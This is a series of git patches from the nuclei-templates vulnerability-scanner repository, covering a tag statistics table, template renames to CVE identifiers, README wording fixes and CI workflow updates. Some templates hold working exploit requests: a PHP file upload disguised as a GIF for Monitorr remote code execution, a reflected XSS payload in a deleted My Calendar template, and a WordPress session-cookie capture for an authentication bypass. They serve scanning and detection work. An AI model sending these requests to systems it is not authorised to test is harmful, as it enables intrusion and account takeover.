| | | | | | | | -| servicenow | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | | weiphp | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | | flash | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | | esmtp | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | | dotnet | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | From d27fb4c3b01e7aadeda17d196c3b124169d6373c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 12:49:16 +0700 Subject: [PATCH 114/149] Renamed CVE-2020-8771.yaml --- .../2020/CVE-2020-8771.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml => cves/2020/CVE-2020-8771.yaml (88%) diff --git a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml b/cves/2020/CVE-2020-8771.yaml similarity index 88% rename from vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml rename to cves/2020/CVE-2020-8771.yaml index 85f0ba23c5..7d5602f3fd 100644 --- a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -1,11 +1,11 @@ -id: wordpress-auth-bypass-wptimecapsule +id: CVE-2020-8771 info: name: WordPress WP Time Capsule Authentication Bypass author: princechaddha severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC - tags: wordpress,wp-plugin + tags: cve,cve2018,wordpress,wp-plugin requests: - raw: @@ -47,4 +47,4 @@ requests: - type: regex part: header regex: - - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" \ No newline at end of file + - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" From 19fe96bc453dabd787465055f6924e88a81e6ca1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:33:16 +0530 Subject: [PATCH 115/149] minor improvements and file name update --- .../2020/CVE-2020-28871.yaml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) rename vulnerabilities/other/monitorr-rce.yaml => cves/2020/CVE-2020-28871.yaml (73%) diff --git a/vulnerabilities/other/monitorr-rce.yaml b/cves/2020/CVE-2020-28871.yaml similarity index 73% rename from vulnerabilities/other/monitorr-rce.yaml rename to cves/2020/CVE-2020-28871.yaml index 86f592d6d9..b6567e7135 100644 --- a/vulnerabilities/other/monitorr-rce.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -1,4 +1,4 @@ -id: monitorr-rce +id: CVE-2020-28871 info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution @@ -6,16 +6,16 @@ info: severity: critical description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 - tags: monitorr,rce,oob + tags: cve,cve2020,monitorr,rce,oob requests: - raw: - | POST /assets/php/upload.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept-Encoding: gzip, deflate Accept: text/plain, */*; q=0.01 Connection: close @@ -24,10 +24,9 @@ requests: Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 Origin: http://{{Hostname}} Referer: http://{{Hostname}} - Content-Length: 319 -----------------------------31046105003900160576454225745 - Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php" + Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif GIF89a213213123 Date: Tue, 20 Jul 2021 11:35:57 +0530 Subject: [PATCH 116/149] Update CVE-2020-8771.yaml --- cves/2020/CVE-2020-8771.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 7d5602f3fd..5cf989eb97 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -5,7 +5,7 @@ info: author: princechaddha severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC - tags: cve,cve2018,wordpress,wp-plugin + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: @@ -24,7 +24,6 @@ requests: Accept: */* cookie-reuse: true - matchers-condition: and matchers: - type: word From 13e5528c46446c4092eedd8cfae0b3fec1d167cf Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:40:23 +0530 Subject: [PATCH 117/149] duplicate update --- cves/2019/CVE-2019-15713.yaml | 2 +- .../wordpress/wpmudev-my-calender-xss.yaml | 29 ------------------- 2 files changed, 1 insertion(+), 30 deletions(-) delete mode 100644 vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 311cc6e005..ab5c7ca5fe 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -2,7 +2,7 @@ id: CVE-2019-15713 info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) - author: daffainfo + author: daffainfo,dhiyaneshDk severity: medium description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. reference: | diff --git a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml b/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml deleted file mode 100644 index 5c59b0b537..0000000000 --- a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: my-calender-xss - -info: - name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) - author: dhiyaneshDk - severity: medium - reference: https://wpscan.com/vulnerability/9267 - tags: wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 From 71f7b947a88c57477dc1fd013b41cfbdfadb7e42 Mon Sep 17 00:00:00 2001 From: Niels Hofmans Date: Tue, 20 Jul 2021 08:14:37 +0200 Subject: [PATCH 118/149] chore: rephrase readme Fixes some grammar mistakes --- README.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index bfb7b06b0d..95561517c1 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@

Nuclei Templates

-

Community curated list of templates for the nuclei engine to find a security vulnerability in application.

+

Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.

@@ -24,7 +24,7 @@ Nuclei Templates ---- -Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -57,7 +57,8 @@ An overview of the nuclei template directory including number of templates assoc 📖 Documentation ----- -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. +Ee have also added a set of example templates to help you understand how things work. 💪 Contributions ----- @@ -67,7 +68,7 @@ Nuclei-templates is powered by major contributions from the community. [Template 💬 Discussion ----- -Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- @@ -79,4 +80,4 @@ You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). Yo - Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. -Thanks again for your contribution and keeping the community vibrant. :heart: +Thanks again for your contribution and keeping this community vibrant. :heart: From 0ae92650b9310bb7c0a01619102b749584231733 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:45:05 +0530 Subject: [PATCH 119/149] minor improvements --- .github/workflows/templates-stats.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 9457a24b98..ff20e740ed 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -26,6 +26,7 @@ jobs: key: ${{ runner.os }}-go - name: Installing Template Stats + if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | @@ -44,6 +45,7 @@ jobs: - name: Commit files run: | + git pull --tags -f git add TEMPLATES-STATS.md git add TEMPLATES-STATS.json git config --local user.email "action@github.com" From 0dacd565679c3510444dd83bd90daeed0289a2f9 Mon Sep 17 00:00:00 2001 From: Niels Hofmans Date: Tue, 20 Jul 2021 08:35:06 +0200 Subject: [PATCH 120/149] chore: rephrase --- .github/scripts/README.tmpl | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 0bb7102614..29e8d08bf1 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -3,7 +3,7 @@ f"""

Nuclei Templates

-

Community curated list of templates for the nuclei engine to find a security vulnerability in application.

+

Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.

@@ -24,7 +24,9 @@ Nuclei Templates ---- -Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. +This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community. +We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -57,27 +59,31 @@ An overview of the nuclei template directory including number of templates assoc 📖 Documentation ----- -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. +We have also added a set of templates to help you understand how things work. 💪 Contributions ----- -Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +Nuclei-templates is powered by major contributions from the community. +[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. 💬 Discussion ----- -Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? +Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- -You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). +You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. 💡 Notes ----- - Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. -Thanks again for your contribution and keeping the community vibrant. :heart: -""" \ No newline at end of file +Thanks again for your contribution and keeping this community vibrant. :heart: +""" From 21809132da8d9bba2b44577ded4598d83aea7f73 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 13:36:04 +0700 Subject: [PATCH 121/149] Renamed to CVE-2021-24340.yaml --- .../2021/CVE-2021-24340.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml => cves/2021/CVE-2021-24340.yaml (92%) diff --git a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml b/cves/2021/CVE-2021-24340.yaml similarity index 92% rename from vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml rename to cves/2021/CVE-2021-24340.yaml index da683968f2..0f6578244b 100644 --- a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -1,4 +1,4 @@ -id: wp-plugin-statistics-sqli +id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - tags: wordpress,wp-plugin,unauth,sqli,blind + tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind requests: - method: GET From c5088ab9bcad51dda15d904c358e12d882dd6ea9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 12:12:18 +0530 Subject: [PATCH 122/149] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 95561517c1..740381b4d9 100644 --- a/README.md +++ b/README.md @@ -58,7 +58,7 @@ An overview of the nuclei template directory including number of templates assoc ----- Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. -Ee have also added a set of example templates to help you understand how things work. +We have also added a set of example templates to help you understand how things work. 💪 Contributions ----- From 4e505722b224a2c86025f99d130edef67ea2fc47 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:49:04 +0700 Subject: [PATCH 123/149] Initialize Top 10 stats --- TOP-10.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 TOP-10.md diff --git a/TOP-10.md b/TOP-10.md new file mode 100644 index 0000000000..8f5b14bdca --- /dev/null +++ b/TOP-10.md @@ -0,0 +1,12 @@ +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | +| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | +| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | From 2d95c8dbfc62128edf16ca2c3b4d19d37fbdd620 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:49:43 +0700 Subject: [PATCH 124/149] Update README template to call get top 10 --- .github/scripts/README.tmpl | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 29e8d08bf1..6c65868500 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -53,7 +53,7 @@ An overview of the nuclei template directory including number of templates assoc - +{get_top10()} 📖 Documentation From 31bae65ed1a001b83418fe2d3da3daf531e39ea4 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:50:15 +0700 Subject: [PATCH 125/149] Add getting top 10 function --- .github/scripts/update-readme.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index 23100c718e..f3bb1efde9 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -8,6 +8,10 @@ def countTpl(path): def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1] +def get_top10(): + TOP10 = command(["cat", "TOP-10.md"]) + return "## Top 10 Contributors\n\n" + TOP10 if len(TOP10) > 0 else "" + if __name__ == "__main__": version = command(["git", "describe", "--tags", "--abbrev=0"]) template = eval(open(".github/scripts/README.tmpl", "r").read()) From 38886322c3efb7d2774c92b2af70b506c4676c8e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:50:37 +0700 Subject: [PATCH 126/149] Update template stats workflow --- .github/workflows/templates-stats.yml | 28 ++++++++++++++++++--------- 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index ff20e740ed..e647edb2f5 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,9 +1,8 @@ name: 🗒 Templates Stats on: - create: - tags: - - v* + schedule: + - cron: "0 0 * * *" workflow_dispatch: jobs: @@ -12,6 +11,8 @@ jobs: steps: - name: Checkout Repo uses: actions/checkout@master + with: + fetch-depth: 0 - name: Setup golang uses: actions/setup-go@v2 @@ -35,19 +36,28 @@ jobs: - name: Markdown Stats run: | - templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/ + templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }} shell: bash - name: JSON Stats run: | - templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/ + templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }} shell: bash - - name: Commit files + - name: Top 10 Stats run: | - git pull --tags -f - git add TEMPLATES-STATS.md - git add TEMPLATES-STATS.json + templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }} + shell: bash + + - name: Get statistical changes + id: stats + run: echo "::set-output name=changes::$(git status -s | wc -l)" + + - name: Commit files + if: steps.stats.outputs.changes > 0 + run: | + git add TEMPLATES-STATS.* + git add TOP-10.md git config --local user.email "action@github.com" git config --local user.name "GitHub Action" git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a From 3dfccad5f187ee09c4e3da2080436306db04fb3a Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:55:28 +0700 Subject: [PATCH 127/149] Add workflow dispatch trigger --- .github/workflows/update-readme.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index f837ccfd4d..0f59dd9677 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -4,6 +4,7 @@ on: create: tags: - v* + workflow_dispatch: jobs: build: From 6d315e62b55daf6533a669376039e82a309821ed Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:57:07 +0700 Subject: [PATCH 128/149] Using variable for heading instead --- .github/scripts/update-readme.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/scripts/update-readme.py b/.github/scripts/update-readme.py index f3bb1efde9..814459587f 100644 --- a/.github/scripts/update-readme.py +++ b/.github/scripts/update-readme.py @@ -9,8 +9,9 @@ def command(args, start=None, end=None): return "\n".join(subprocess.run(args, text=True, 